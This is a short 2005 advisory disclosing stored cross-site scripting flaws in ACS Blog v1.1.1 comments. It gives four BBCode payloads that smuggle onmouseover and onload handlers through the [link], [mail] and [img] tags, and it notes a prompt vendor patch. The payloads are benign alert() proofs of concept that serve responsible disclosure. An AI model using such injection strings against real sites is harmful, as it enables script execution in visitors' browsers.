Multiple XSS vulnerabilities in ACS Blog

Type securityvulns
Reporter Securityvulns
Modified 2005-03-31T00:00:00


These vulnerabilities have been tested on the latest version of ACS Blog. (v1.1.1)

In the comments section of ACS Blog, it is possible to execute an XSS attack through the [link], [mail], and [img] tags, due to lack of filtering of single quotes and spaces inside the tags.


[link=' onmouseover='alert("XSS vulnerability")' o=']Don't you wanna see where this link goes?[/link]

[' onmouseover='alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

[img]' onload='alert("XSS vulnerability")' o='[/img]

[link= target=_blank' onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

Vendor responded within 2 hours of notification, notified users with the security alert on its main page, and patched the vulnerabilities within another couple of hours.

Cheers, Dan